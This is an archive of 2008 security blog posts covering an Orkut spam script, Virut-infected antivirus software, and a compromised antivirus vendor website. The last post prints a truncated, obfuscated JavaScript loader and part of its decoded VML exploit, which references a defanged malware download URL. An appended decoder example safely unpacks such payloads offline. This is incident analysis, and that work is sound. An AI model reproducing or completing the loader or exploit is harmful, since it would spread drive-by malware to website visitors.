Archive for February, 2008

Orkut Spam is in the wild…….

Posted in Uncategorized on February 21, 2008 by ianstarkc

Yesterday someone reported that malicious JavaScript is circulating in the wild, resulting in lots of spam to Orkut users about Innobuzz course details. I contacted the author of the blog, and he gave me the shocking reply he had received.

This is Rohit. I’m the person responsible for developing the Orkut script (Anybody who wants to sue, this is the buddy) which you are talking about.

First let me tell you that I would have done the same as what you have done if I were in your shoes, but our company has not at all created this script. The script which we created is available here: Website_name. This was circulated in a closed environment within a few friends to show how Orkut can be used for spamming purposes. (It means Innobuzz is teaching how to spam through Orkut!! Under US Law to teach like that is illegal and subject to punishment) However, it seems that someone has made a copy of the script, changed the title to something which appeals to everyone and let it free on Orkut.


That’s hilarious!! Throughout my past six years of experience in Information Security and Cyber Law, this is the first and foremost important fact: “Security concern through internal threats within company”. There are lots of papers on the internet about protecting the company environment from internal threats. This is also one example of that, if it is so. According to Rohit Sharma of InnoBuzz, that script was just a demo in their internal and limited environment, and somebody copied and circulated it, resulting in a spam DDoS of their website. Is it legal to present a demo with the live social networking website “Orkut”, and where is the limit?
That’s even worse: they are teaching courses like “Ethical hacking” and they don’t know how to give a demo? I am of the opinion that they did it intentionally for advertisement. Anyway, here you can find more info about that script.

UPDATE: “Finally, Google has closed the website and the script” – Rohit Sharma
                       Close the Company as well  !!!!! 🙂


Antivirus company selling infected Antivirus software !!!!!!!!!

Posted in Uncategorized on February 12, 2008 by ianstarkc

It’s again “VIRUT”

This time a Pune (India) based antivirus company is serving antivirus software which is itself infected with the “Virut” virus.

Read more Info at:  Here

Antivirus company website is infected!!!

Posted in Uncategorized on February 6, 2008 by ianstarkc

UPDATE (08/02): The malicious IFRAME has been removed. Web admins should know the various methods of attack, and keep their sites/servers updated and audited.

What do you think if an antivirus company’s website is itself infecting its users? Well, that’s the most alarming situation for web security, and it shows the problem of surfing supposed-to-be trusted websites.
The same happened to the website of Delhi (India) based AVsoft Technologies, http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable of detecting malware!

The infection is carried out by exploiting common vulnerabilities using an encrypted script. In this case it looks like:

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….

which decrypts to

<html xmlns:v="urn:schemas-microsoft-com:vml"><head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id="myDivA"></div>
<script language="JavaScript">
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….

function Attack(n)
 {…
'<param name="src" value=" http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…

4.jpg

3.jpg

2.jpg

All of this is used by the infamous (underground networks!!) tool “IcePack”. You can see its admin console below.

1.jpg

Already reported to the concerned authorities.
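
To inspect a payload packed with the dc() routine quoted above without rendering it, the routine can be re-implemented so that it returns the decoded text instead of calling document.write(). This is an added example, not code from the original post; DEMO_ALPHABET, DEMO_TABLE, SAMPLE and the function names are constructed for the demo, because the table as printed in the post has only 28 entries and does not cover the characters of the quoted payload.

```javascript
// Offline decoder for the dc() packing quoted in the post. It returns the
// decoded text for inspection and never calls document.write() or eval().
const XOR_KEY = 165; // XOR constant from the quoted dc() routine

// Lookup table exactly as printed in the post, indexed by (charCode - 48).
const PAGE_TABLE = [63, 37, 11, 46, 55, 34, 16, 14, 60, 58, 0, 0, 0, 0, 0, 0,
  18, 24, 29, 45, 6, 38, 48, 41, 61, 50, 33, 17];

// CONSTRUCTED 64-symbol alphabet and table, used only for the demo below.
const DEMO_ALPHABET =
  '0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz';

function buildTable(alphabet) {
  const table = [];
  for (let i = 0; i < alphabet.length; i++) {
    table[alphabet.charCodeAt(i) - 48] = i; // symbol -> 6-bit value
  }
  return table;
}
const DEMO_TABLE = buildTable(DEMO_ALPHABET);

// Each symbol contributes 6 bits, least significant first; every completed
// byte is XORed with the key. Four symbols therefore yield three bytes.
function decodeDc(encoded, table, xorKey = XOR_KEY) {
  let text = '';
  let w = 0; // bit accumulator
  let s = 0; // shift for the next 6-bit value
  const unknown = new Set(); // symbols the table has no entry for
  for (const ch of encoded) {
    const v = table[ch.charCodeAt(0) - 48];
    if (v === undefined) unknown.add(ch); // dc() would silently use 0 here
    w |= (v || 0) << s;
    if (s) {
      text += String.fromCharCode(xorKey ^ (w & 255));
      w >>= 8;
      s -= 2;
    } else {
      s = 6;
    }
  }
  return { text, unknown: [...unknown] };
}

// CONSTRUCTED sample, encoded by hand with DEMO_TABLE.
const SAMPLE = 'OmwkMIBm0fsa';
console.log(decodeDc(SAMPLE, DEMO_TABLE));         // text: '<iframe/>'
console.log(decodeDc('gPjE', PAGE_TABLE).unknown); // [ 'g', 'P', 'j' ]
```

A non-empty `unknown` list means the table in hand is incomplete for that payload, so the decoded text should not be trusted until the full table is recovered from the original sample.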